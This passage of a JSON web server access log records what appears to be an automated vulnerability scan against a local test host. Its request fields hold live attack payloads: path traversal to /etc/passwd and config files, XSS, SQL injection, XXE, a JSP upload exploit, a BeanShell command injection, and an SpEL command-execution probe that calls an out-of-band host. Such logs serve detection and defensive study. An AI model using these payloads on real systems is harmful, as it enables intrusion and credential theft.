/sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stats/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%EF%BD%B0example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /297MU0bn5WDJNonyoT9Bpnq90Xy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /(download)/tmp/poc.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"username=airflow&password=airflow&_csrf_token={{csrf_token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"http://127.0.0.1/admin/airflow/login", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/94 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.171","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passwordrecovered.cgi?id=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /axis/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/taskProc?taskId=shortURL&taskEnv=xml&taskContentType=xml&srcURL=https://google.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=example.com&_url=example.com&callback=example.com&checkout_url=example.com&content=example.com&continue=example.com&continueTo=example.com&counturl=example.com&data=example.com&dest=example.com&dest_url=example.com&dir=example.com&document=example.com&domain=example.com&done=example.com&download=example.com&feed=example.com&file=example.com&host=example.com&html=example.com&http=example.com&https=example.com&image=example.com&image_src=example.com&image_url=example.com&imageurl=example.com&include=example.com&langTo=example.com&media=example.com&navigation=example.com&next=example.com&open=example.com&out=example.com&page=example.com&page_url=example.com&pageurl=example.com&path=example.com&picture=example.com&port=example.com&proxy=example.com&redir=example.com&redirect=example.com&redirectUri=example.com&redirectUrl=example.com&reference=example.com&referrer=example.com&req=example.com&request=example.com&retUrl=example.com&return=example.com&returnTo=example.com&return_path=example.com&return_to=example.com&rurl=example.com&show=example.com&site=example.com&source=example.com&src=example.com&target=example.com&to=example.com&uri=example.com&url=example.com&val=example.com&validate=example.com&view=example.com&window=example.com&redirect_to=example.com&ret=example.com&r2=example.com&img=example.com&u=example.com&r=example.com&URL=example.com&AuthState=example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"email=springbird@qq.com&password=springbird&remeber=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22297MTwOeH18OMFSaHhy8G9Lm3uT.jsp\x22\x0D\x0AContent-Type: image/jpeg\x0D\x0A\x0D\x0A<%@ page import=\x22java.util.*,java.io.*\x22%>\x0D\x0A<%@ page import=\x22java.security.MessageDigest\x22%>\x0D\x0A<%\x0D\x0AString cve = \x22CVE-2018-15961\x22;\x0D\x0AMessageDigest alg = MessageDigest.getInstance(\x22MD5\x22);\x0D\x0Aalg.reset();\x0D\x0Aalg.update(cve.getBytes());\x0D\x0Abyte[] digest = alg.digest();\x0D\x0AStringBuffer hashedpasswd = new StringBuffer();\x0D\x0AString hx;\x0D\x0Afor (int i=0;i\x0D\x0A-----------------------------24464570528145\x0D\x0AContent-Disposition: form-data; name=\x22path\x22\x0D\x0A\x0D\x0A297MTwOeH18OMFSaHhy8G9Lm3uT.jsp\x0D\x0A-----------------------------24464570528145--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /msa/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /BSW_cxttongr.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/95 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http/.....///.....///config/config_db.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /check_mk/login.py HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CMSPages/logon.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/297MTwOeH18OMFSaHhy8G9Lm3uT.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448 HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/db-backup/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/96 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=.....///http/.....///config/config_db.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/cq/security/userinfo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /OA_HTML/lcmServiceController.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.006","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"bsh.script=exec(\x22cat+/etc/passwd\x22);&bsh.servlet.output=raw","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/97 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.176","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"\x0D\x0A]>\x0D\x0A\x0D\x0A\x0D\x0Aaaaaa\x0D\x0A&xxe;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Autodiscover/Autodiscover.xml HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"type=image&field_id=image&tag=image&from=image&search=image&options=[\x22test'); INSERT INTO extra_field_rel_tag(field_id, tag_id, item_id) VALUES (16, 16, 16); INSERT INTO extra_field_values(field_id, item_id,value) VALUES (16, 16,'297MTnAue6apDdUW580RcqqDk8m'); INSERT INTO extra_field_options(option_value) VALUES ('297MTnAue6apDdUW580RcqqDk8m'); INSERT INTO tag (id, tag, field_id,count) VALUES(16, '297MTnAue6apDdUW580RcqqDk8m', 16,0) ON DUPLICATE KEY UPDATE tag='297MTnAue6apDdUW580RcqqDk8m', field_id=16, count=0; -- \x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main/inc/ajax/extra_field.ajax.php?a=search_options_from_tags HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /core/config/databases.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default/en_US/frame.html?content=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/thumb.php?dir=http\x5C\x5C..\x5C\x5C..\x5C\x5Cconfig\x5C\x5Cconfig_db.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20c9v8h88smpv8c1ig07h0erhd9iriz3fwc.oast.fun%22%29%7D__::.x/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.179","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_admin/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.prod.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.173","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aims/ps/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:11 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /accounts/login/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like 